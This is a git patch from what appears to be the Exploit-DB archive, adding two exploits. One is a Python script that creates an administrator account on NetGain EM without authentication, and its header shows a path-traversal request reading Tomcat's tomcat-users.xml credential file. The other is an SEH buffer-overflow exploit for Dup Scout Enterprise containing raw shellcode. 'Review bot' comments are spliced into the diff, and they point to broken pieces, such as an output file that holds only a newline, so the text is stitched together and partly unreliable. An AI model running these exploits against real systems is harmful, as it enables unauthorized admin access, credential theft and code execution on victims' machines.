From 07c41df34df322f7c18c7152e91a5bdd2f091eaa Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 25 May 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-05-25 2 new exploits Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034) Microsoft Windows XP - Keyboard Layouts Pool Corruption (PoC) (MS12-034) Microsoft Internet Explorer 6 - HtmlDlgSafeHelper Remote Denial of Service Microsoft Internet Explorer 6 - 'HtmlDlgSafeHelper' Remote Denial of Service Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion
---
files.csv | 6 +- platforms/jsp/webapps/42058.py | 122 +++++++++++++++++++++++++++++++ platforms/windows/local/42059.py | 60 +++++++++++++++ 3 files changed, 186 insertions(+), 2 deletions(-) create mode 100755 platforms/jsp/webapps/42058.py create mode 100755 platforms/windows/local/42059.py
diff --git a/files.csv b/files.csv
index c8069e77b..0959e9ddc 100644
--- a/files.csv
+++ b/files.csv
@@ -2200,7 +2200,7 @@ id,file,description,date,author,platform,type,port
 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0
 18890,platforms/multiple/dos/18890.txt,"Java - Trigerring Java Code from a .SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0
 18909,platforms/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference",2012-05-21,condis,php,dos,0
-18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos,0
+18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos,0
 18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 - Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0
 18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - '.DAL' File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0
 18910,platforms/php/dos/18910.php,"PHP 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0
@@ -3586,7 +3586,7 @@ id,file,description,date,author,platform,type,port
 28194,platforms/windows/dos/28194.txt,"Microsoft Internet Explorer 6 - RDS.DataControl Denial of Service",2006-07-08,hdm,windows,dos,0
 28196,platforms/windows/dos/28196.txt,"Microsoft Internet Explorer 6 - DirectAnimation.DAUserData Denial of Service",2006-07-08,hdm,windows,dos,0
 28197,platforms/windows/dos/28197.txt,"Microsoft Internet Explorer 6 - Object.Microsoft.DXTFilter Denial of Service",2006-07-09,hdm,windows,dos,0
-28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - HtmlDlgSafeHelper Remote Denial of Service",2006-07-10,hdm,windows,dos,0
+28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - 'HtmlDlgSafeHelper' Remote Denial of Service",2006-07-10,hdm,windows,dos,0
 28207,platforms/windows/dos/28207.txt,"Microsoft Internet Explorer 6 - TriEditDocument Denial of Service",2006-07-11,hdm,windows,dos,0
 28213,platforms/windows/dos/28213.txt,"Microsoft Internet Explorer 6 - RevealTrans Denial of Service",2006-07-12,hdm,windows,dos,0
 28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x - ReplaceChild Denial of Service",2006-07-14,hdm,linux,dos,0
@@ -9008,6 +9008,7 @@ id,file,description,date,author,platform,type,port
 42020,platforms/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local,0
 42045,platforms/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation",2017-05-22,"Google Security Research",linux,local,0
 42053,platforms/linux/local/42053.c,"KDE 4/5 - 'KAuth' Privilege Escalation",2017-05-18,Stealth,linux,local,0
+42059,platforms/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -37778,6 +37779,7 @@ id,file,description,date,author,platform,type,port
 41697,platforms/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
 41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
+42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0
 41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
 41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
 41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/jsp/webapps/42058.py b/platforms/jsp/webapps/42058.py
new file mode 100755
index 000000000..395cf114f
--- /dev/null
+++ b/platforms/jsp/webapps/42058.py
@@ -0,0 +1,122 @@
+'''
+# Exploit Title: Add User Account with Admin Privilege without Login & Local File Inclusion
+# Date: 2017-05-21
+# Exploit Author: f3ci
+# Vendor Homepage: http://www.netgain-systems.com
+# Software Link: http://www.netgain-systems.com/free-edition-download/
+# Version: <= v7.2.647 build 941
+# Tested on: Windows 7
+
+Add User Account with Admin Privilege without Login
+----------------------------------------------
+We can create user and give admin privilege to user which we have made
+without login.
+Because this app does not check the session on this request
+
+
+Local File Inclusion
+----------------------------------------------
+Normal Request:
+
+POST /u/jsp/log/download_do.jsp HTTP/1.1
+Host: 192.168.0.21:8081
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.21:8081/u/index.jsp
+Cookie: JSESSIONID=8A172EB8DDBD08D1E6D25A1CE8CC74AC
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 18
+
+filename=iossd.log
+
+We can download another file with change value on filename parameter and
+also we can send this request without login.
+
+Example:
+
+POST /u/jsp/log/download_do.jsp HTTP/1.1
+Host: 192.168.0.21:8081
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.21:8081/u/index.jsp
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 18
+
+filename=../../tomcat/conf/tomcat-users.xml
+'''
+#!/usr/local/bin/python
+# Exploit Title: Add User Account with Admin Privilege without Login
+# Date: 2017-05-21
+# Exploit Author: f3ci
+# Vendor Homepage: http://www.netgain-systems.com
+# Software Link: http://www.netgain-systems.com/free-edition-download/
+# Version: <= v7.2.647 build 941
+# Tested on: Windows 7
+
+import requests
+import sys
+
+try:
+ def create():
+ ip = str(sys.argv[1])
+ port = str(sys.argv[2])
+ user = str(sys.argv[3])
+ passwd = str(sys.argv[4])
+
+ print "\033[1;32m[+]\033[1;m Try to Create user"
+ url="http://"+ip+":"+port+"/u/jsp/security/user_save_do.jsp"
+ data= {
+ 'new': "true",
+ 'id': "",
+ 'name': user,
+ 'dname': "foobar",
+ 'password': passwd,
+ 'password2': passwd,
+ 'description': "",
+ 'emails': "foo@bar.com",
+ 'mobileNumber': "000000",
+ 'loginAttempts': "5",
+ }
+ response = requests.post(url, data=data)
+ status = response.status_code
+ if status == 200:
+ print "\033[1;32m[+]\033[1;m Success!!"
+ role()
+ else:
+ print "\033[91m[-]\033[91;m Create User Failed"
+
+
+ def role():
+ ip = str(sys.argv[1])
+ port = str(sys.argv[2])
+ user = str(sys.argv[3])
+ passwd = str(sys.argv[4])
+
+ print "\033[1;32m[+]\033[1;m Get admin role"
+ url="http://"+ip+":"+port+"/u/jsp/security/role_save_do.jsp"
+ data= {
+ 'name': "admin",
+ 'description': "Administrator",
+ 'users': [user,"admin"],
+ }
+ response = requests.post(url, data=data)
+ status = response.status_code
+ if status == 200:
+ print "\033[1;32m[+]\033[1;m Success!!"
+ print "\033[1;32m[+]\033[1;m Login with user:" +user+ " password:" + passwd
+ else:
+ print "\033[91m[-]\033[91;m Get admin role Failed"
+
+ create();
+
+except:
+ print "\033[91m[!]\033[91;m Usage: %s " % str(sys.argv[0])
+ print "\033[91m[!]\033[91;m Ex: %s 127.0.0.1 8081 foobar passw0rd" % str(sys.argv[0])
diff --git a/platforms/windows/local/42059.py b/platforms/windows/local/42059.py
new file mode 100755
index 000000000..ce27b42c1
--- /dev/null
+++ b/platforms/windows/local/42059.py
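Review bot: The `#!/usr/local/bin/python` line follows the closing `'''` of the header block instead of being line 1, so although the file is added with mode 100755 it is only a comment and the script cannot be run by path; the `print "..."` statement syntax also makes it Python 2 only, which the header does not mention. The bare `except:` wrapping the whole body, both `def`s and the `create();` call, turns every failure, including a connection error or a keyboard interrupt, into the usage message, so the real cause is never shown; `except IndexError:` would keep that branch for the missing-argument case it is written for. The header's second request declares `Content-Length: 18` but its body `filename=../../tomcat/conf/tomcat-users.xml` is longer, and the `Usage: %s ` string ends right after `%s`, which suggests angle-bracketed placeholders were stripped when the text was rendered. The header states the root cause (the endpoint does not check the session) but not the fix; a line such as `# Fix: require an authenticated admin session on user_save_do.jsp / role_save_do.jsp and restrict download_do.jsp 'filename' to a fixed log directory` would make the remediation explicit for defenders reading the entry.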
@@ -0,0 +1,60 @@
+author = '''
+
+ ##############################################
+ # Created: ScrR1pTK1dd13 #
+ # Name: Greg Priest #
+ # Mail: ScR1pTK1dd13.slammer@gmail.com #
+ ##############################################
+
+# Exploit Title: Dup Scout Enterprise v9.7.18 Import Local Buffer Overflow Vuln.(SEH)
+# Date: 2017.05.24
+# Exploit Author: Greg Priest
+# Version: Dup Scout Enterprise v9.7.18
+# Tested on: Windows7 x64 HUN/ENG Professional
+'''
+
+
+import os
+import struct
+
+overflow = "A" * 1536
+jmp_esp = "\x94\x21\x1C\x65"
+#651F20E5
+#651F214E
+#652041ED
+nop = "\x90" * 16
+esp = "\x8D\x44\x24\x4A"
+jmp = "\xFF\xE0"
+nop2 = "\x90" * 70
+nSEH = "\x90\x90\xEB\x05"
+SEH = "\x80\x5F\x1C\x90"
+#"\x80\x5F\x1C\x65"
+#6508F78D
+#650E129F
+#651C5F80
+shellcode =(
+"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
+"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
+"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
+"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
+"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
+"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
+"\x45\x81\x3e\x43\x72\x65\x61\x75" +
+"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
+"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
+"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
+"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
+"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
+"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
+"\x53\x53\x53\x53\x52\x53\xff\xd7")
+
+crash = overflow+jmp_esp+nop+esp+jmp+nop2+nSEH+SEH+"\x90" * 10+shellcode
+
+evil = '\n'
+exploit = open('Ev1l.xml', 'w')
+exploit.write(evil)
+exploit.close()
+
+print "Ev1l.xml raedy!"
+
+
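Review bot: `crash` is assembled right after the `shellcode` assignment but is never referenced again, and `evil` is the bare string `'\n'`, so `Ev1l.xml` as written holds a single newline and none of the assembled data; the page appears to have dropped angle-bracketed text when rendering (the sibling 42058.py shows the same loss in its `Usage: %s ` string), so this entry should be compared with the original submission before it is trusted as archived. `import os` and `import struct` are both unused. The `print "Ev1l.xml raedy!"` statement (typo for "ready") pins the script to Python 2, which the header block could state next to `Tested on:`.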